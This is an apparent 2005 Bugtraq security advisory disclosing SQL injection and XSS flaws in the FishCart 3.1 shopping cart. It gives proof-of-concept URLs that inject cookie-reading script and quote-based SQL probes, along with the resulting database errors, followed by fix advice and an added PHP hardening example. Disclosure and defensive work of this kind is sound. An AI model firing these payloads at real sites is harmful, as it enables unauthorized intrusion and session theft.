Date: 4 May 2005 03:10:28 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL injections and XSS in FishCart 3.1




Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I don't find anything, it's FREE..!!
http://www.digitalparadox.org/services.ah

Looking for publishers interested in my PHP Secure Coding Book.

Severity: High
Title: Multiple SQL injections and XSS in FishCart 3.1
Date: 4/05/2005

Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are multiple SQL injections and XSS in FishCart 3.1.


Proof of Concept Exploits:

http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&olimit=0&cat=&key1=&psku=
XSS

http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
SQL INJECTION

Database error: Invalid SQL: select count(*) as cnt from
cvsdemo31prod,cvsdemo31prodlang where nzid=1 and nprodsku=prodsku and
prodzid=1 and nprodsku=prodlsku and prodlzid=1 and
prodlid=1prodsku='''SQL_INJECTION' and prodlsku='''SQL_INJECTION' and
prodzid=1 and prodzid=prodlzid and prodlid=1 and (produseinvq=0 or
(produseinvq=1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')
Session halted.


http://example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
SQL INJECTION

Database error: Invalid SQL: select sku,qty from cvsdemo31oline where
orderid=''SQL_INJECTION'
MySQL Error: 1064 (You have an error in your SQL syntax near
'SQL_INJECTION'' at line 1)
Session halted.

http://example.com/demo31/upstracking.php?trackingnum='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&reqagree=checked&m=
XSS


http://example.com/demo31/upstracking.php?trackingnum=&reqagree='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&m=
XSS

http://example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS


Possible Fixes: The usage of htmlspecialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before
passing user input to the MySQL database, or before echoing data on the
screen, would solve these problems.

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to
contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/.
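
The fixes suggested in the advisory, as an added example that is not part of the original post or of FishCart: it uses a PDO prepared statement in place of mysql_escape_string()/mysql_real_escape_string() (the mysql_* functions were removed in PHP 7.0) and htmlspecialchars() with ENT_QUOTES, since the advisory's payloads begin with a single quote. The table name comes from the error output above; the in-memory SQLite database, function names, sample rows and the digits-only cart id rule are assumptions.

```php
<?php
// Added example, not FishCart code. The table and column names are taken from
// the error output in the advisory; the SQLite in-memory database, function
// names and sample rows are constructed so the script runs offline.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cvsdemo31oline (orderid TEXT, sku TEXT, qty INTEGER)");
$db->exec("INSERT INTO cvsdemo31oline VALUES ('200505024231092', 'ROD-01', 2)");
$db->exec("INSERT INTO cvsdemo31oline VALUES ('200505029999999', 'REEL-07', 1)");

// Pattern implied by the error message: user input concatenated into the SQL text.
function order_lines_concat(PDO $db, string $cartid): array {
    $sql = "select sku,qty from cvsdemo31oline where orderid='$cartid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the expected shape (assumption: cart ids are digits only),
// then bind the value so it is never parsed as SQL.
function order_lines_bound(PDO $db, string $cartid): array {
    if (!ctype_digit($cartid)) {
        return [];
    }
    $st = $db->prepare("select sku,qty from cvsdemo31oline where orderid = ?");
    $st->execute([$cartid]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Output encoding for values echoed into HTML text or attribute values.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$probe = "'SQL_INJECTION";   // the marker string used in the advisory
try {
    order_lines_concat($db, $probe);
} catch (PDOException $e) {
    echo "concatenated query: syntax error, input reached the SQL parser\n";
}
echo "bound query, probe: ", count(order_lines_bound($db, $probe)), " rows\n";
echo "bound query, valid id: ", count(order_lines_bound($db, '200505024231092')), " rows\n";

// The trackingnum value from the advisory, rendered inert inside an attribute.
$tracking = "'\"><script>alert(document.cookie)</script>";
echo '<input name="trackingnum" value="', h($tracking), "\">\n";
```

Before PHP 8.1, htmlspecialchars() called without ENT_QUOTES leaves single quotes unescaped, so the flag is passed explicitly here.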

